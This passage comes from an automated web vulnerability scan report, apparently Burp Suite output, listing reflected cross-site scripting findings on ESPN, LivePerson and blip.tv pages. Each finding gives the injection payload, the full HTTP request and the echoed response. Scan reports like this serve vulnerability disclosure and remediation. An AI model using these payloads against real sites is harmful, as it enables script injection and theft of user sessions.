The value of the divID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9432a'%3balert(1)//c0ea75e1430 was submitted in the divID parameter. This input was echoed as 9432a';alert(1)//c0ea75e1430 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hc/14598237/?cmd=mTagRepstate&site=14598237&buttonID=15&divID=lpButDivID-13013362139432a'%3balert(1)//c0ea75e1430&bt=3&c=1 HTTP/1.1
Host: server.iad.liveperson.net
Connection: keep-alive
Referer: http://www.reputation.com/company
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=8031612796209450195; LivePersonID=-16601209214853-1303177645:-1:1303177658:-1:-1; HumanClickCHATKEY=8250723888827042337; HumanClickSiteContainerID_14598237=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303177753362

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:56:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Set-Cookie: HumanClickSiteContainerID_14598237=STANDALONE; path=/hc/14598237
Set-Cookie: LivePersonID=-16601209214853-1303177645:-1:1303177658:-1:-1; expires=Wed, 18-Apr-2012 01:56:10 GMT; path=/hc/14598237; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 18338

function staticButton(objName,divID,buttonName,buttonId,config,state,butHtmlTemplate,server,site,protocol,servlet,windowWidth,windowHeight){this.CHAT=1;this.VOICE=2;this.BUTTON=1;this.CHATBOX=2;this.T
...[SNIP]...
tatic)=='undefined') {var lpMTagStatic={};} lpMTagStatic.lpStaticBut13031781709976276341300234937596 = new staticButton('lpMTagStatic.lpStaticBut13031781709976276341300234937596','lpButDivID-13013362139432a';alert(1)//c0ea75e1430','Link 03/24 for Saurabh',15,{'id':15,'name':"Link 03/24 for Saurabh",chanel:1,enabled:true,buttonType:3,voiceType:-1,stickyType:1,description:"Link 03/24 for Saurabh",buttonContent:1,addTextToButton:
...[SNIP]...

3.331. http://soccernet.espn.go.com/team [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0321"%3balert(1)//d2fdfaa962c was submitted in the cc parameter. This input was echoed as c0321";alert(1)//d2fdfaa962c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /team?id=190&cc=5901c0321"%3balert(1)//d2fdfaa962c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:47 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Set-Cookie: SWID=9C26EDED-89CF-48C8-B3F7-8885D279085F; path=/; expires=Wed, 23-Feb-2031 23:06:47 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:47 GMT
Content-Length: 27184
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:47 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901c0321";alert(1)//d2fdfaa962c",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

3.332. http://soccernet.espn.go.com/team [cc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://soccernet.espn.go.com
Path:   /team

Issue detail

The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563e2"><script>alert(1)</script>a0867662a73 was submitted in the cc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /team?id=190&cc=5901563e2"><script>alert(1)</script>a0867662a73 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 23 Feb 2011 23:06:46 GMT
Content-Type: text/html; charset=iso-8859-1
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN32
Set-Cookie: SWID=0080C2D3-BF04-4C91-85A0-65F5A6E54CD3; path=/; expires=Wed, 23-Feb-2031 23:06:46 GMT; domain=.go.com;
Cache-Expires: Wed, 23 Feb 2011 23:11:46 GMT
Content-Length: 27281
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; expires=Sat, 05 Mar 2011 23:06:46 GMT; Path=/; Domain=.go.com
Connection: close
Via: 8810-05/06
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>New York Red Bulls
...[SNIP]...
ng()].join("")}}(function(){var c=false,e="AcceptCookies";if(document.cookie.indexOf(e)!==-1){c=true}else{cookieFunc(e,"yes",3);cookie=cookieFunc(e,null,null);if(cookie!=null){c=true}}if(c){var g="5901563e2"><script>alert(1)</script>a0867662a73",d=cookieFunc("COREG"),f=window.location,a="replace";if(g!=null){g=g+""}if(d!=null&&d!==g){setORef();if(location.toString().indexOf("cc=")!=-1){var b=new RegExp("cc="+g,"i");f=f.toString()[a](b,"cc="+
...[SNIP]...

3.333. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f1e'%3balert(1)//c148b0a504b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a5f1e';alert(1)//c148b0a504b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?a5f1e'%3balert(1)//c148b0a504b=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54394
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1716121387
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourcebarcelona2010.blip.tv/rss?sort=custom;page=1;date=;a5f1e';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;a5f1e\';alert(1)//c148b0a504b=1;user=sourcebarcelona2010;s=posts';
           
       
   </script>
...[SNIP]...

3.334. http://sourcebarcelona2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourcebarcelona2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65992"><script>alert(1)</script>7d42614a729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?65992"><script>alert(1)</script>7d42614a729=1 HTTP/1.1
Host: sourcebarcelona2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:15 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54475
Date: Tue, 19 Apr 2011 19:48:15 GMT
X-Varnish: 1342697601
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=custom;date=;user=sourcebarcelona2010;s=posts;65992"><script>alert(1)</script>7d42614a729=1;page=2">
...[SNIP]...

3.335. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6a5"><script>alert(1)</script>1e232d81774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?bf6a5"><script>alert(1)</script>1e232d81774=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53436
Date: Tue, 19 Apr 2011 19:47:50 GMT
X-Varnish: 941599355
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;date=;bf6a5"><script>alert(1)</script>1e232d81774=1;user=sourceboston2008;s=posts;page=2">
...[SNIP]...

3.336. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2008.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a96b9'%3balert(1)//ac16476f5de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a96b9';alert(1)//ac16476f5de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?a96b9'%3balert(1)//ac16476f5de=1 HTTP/1.1
Host: sourceboston2008.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53340
Date: Tue, 19 Apr 2011 19:47:52 GMT
X-Varnish: 723153243
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2008.blip.tv/rss?a96b9';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           window.generic_feed_uri = 'a96b9\';alert(1)//ac16476f5de=1;sort=date;page=1;date=;user=sourceboston2008;s=posts';
           
       
   </script>
...[SNIP]...

3.337. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282e3"><script>alert(1)</script>0b14ceaf125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?282e3"><script>alert(1)</script>0b14ceaf125=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
X-otter-skin: blipnew
Vary: Cookie
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:17 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 55008
Date: Tue, 19 Apr 2011 19:48:17 GMT
X-Varnish: 1716121237
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?sort=date;282e3"><script>alert(1)</script>0b14ceaf125=1;date=;user=sourceboston2009;s=posts;page=2">
...[SNIP]...

3.338. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2009.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f00'%3balert(1)//ce990a6fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22f00';alert(1)//ce990a6fdd2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?22f00'%3balert(1)//ce990a6fdd2=1 HTTP/1.1
Host: sourceboston2009.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:48:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54897
Date: Tue, 19 Apr 2011 19:48:18 GMT
X-Varnish: 1427563464
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2009.blip.tv/rss?sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00';alert(1)//ce990a6fdd2=1';
           window.generic_feed_uri = 'sort=date;page=1;date=;user=sourceboston2009;s=posts;22f00\';alert(1)//ce990a6fdd2=1';
           
       
   </script>
...[SNIP]...

3.339. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2b"><script>alert(1)</script>973845e00e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /posts?3ca2b"><script>alert(1)</script>973845e00e3=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 54010
Date: Tue, 19 Apr 2011 19:47:48 GMT
X-Varnish: 941599049
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="/?3ca2b"><script>alert(1)</script>973845e00e3=1;sort=custom;date=;user=sourceboston2010;s=posts;page=2">
...[SNIP]...

3.340. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sourceboston2010.blip.tv
Path:   /posts

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eccf8'%3balert(1)//75f0ef58d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eccf8';alert(1)//75f0ef58d87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /posts?eccf8'%3balert(1)//75f0ef58d87=1 HTTP/1.1
Host: sourceboston2010.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 03-May-2011 19:47:49 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53899
Date: Tue, 19 Apr 2011 19:47:49 GMT
X-Varnish: 441991143
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<script type="text/javascript">
   
       
                       window.rss_feed_url = 'http://sourceboston2010.blip.tv/rss?sort=custom;page=1;date=;eccf8';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           window.generic_feed_uri = 'sort=custom;page=1;date=;eccf8\';alert(1)//75f0ef58d87=1;user=sourceboston2010;s=posts';
           
       
   </script>
...[SNIP]...

3.341. http://sports.espn.go.com/chicago/nba/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nba/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload de58b--><script>alert(1)</script>a255c6a6a00 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:21:50 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:21:50 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 26 Feb 2011 02:22:50 GMT
Content-Length: 48139
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Coaching Chicago Bu
...[SNIP]...
<!--url:/chicago/nba/columns/story?columnist=greenberg_jonde58b--><script>alert(1)</script>a255c6a6a00&id=6146046-->
...[SNIP]...

3.342. http://sports.espn.go.com/chicago/nfl/columns/story [columnist parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/nfl/columns/story

Issue detail

The value of the columnist request parameter is copied into an HTML comment. The payload df167--><script>alert(1)</script>1c3289f1740 was submitted in the columnist parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; s_pers=%20s_c24%3D1298497403866%7C1393105403866%3B%20s_c24_s%3DFirst%2520Visit%7C1298499203866%3B%20s_gpv_pn%3Despnnewyork%253Anewyork%253Ahome%253Aindex%7C1298499203874%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B%20s_ppv%3D25%3B; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; s_vi=[CS]v1|26B2BFB9850139D0-4000010EA079E4CC[CE]; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; userAB=F; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 200 OK
Cache-Control: max-age=60
Date: Sat, 26 Feb 2011 02:22:33 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 26 Feb 2011 02:22:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 26 Feb 2011 02:23:33 GMT
Content-Length: 41569
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Dave Duerson's form
...[SNIP]...
<!--url:/chicago/nfl/columns/story?columnist=isaacson_melissadf167--><script>alert(1)</script>1c3289f1740&id=6137245-->
...[SNIP]...

3.343. http://sports.espn.go.com/chicago/teams/recap [sport parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://sports.espn.go.com
Path:   /chicago/teams/recap

Issue detail

The value of the sport request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0f9"><script>alert(1)</script>e1494246220 was submitted in the sport parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /chicago/teams/recap?gameId=310542507&sport=ncbbf0f9"><script>alert(1)</script>e1494246220 HTTP/1.1
Host: sports.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
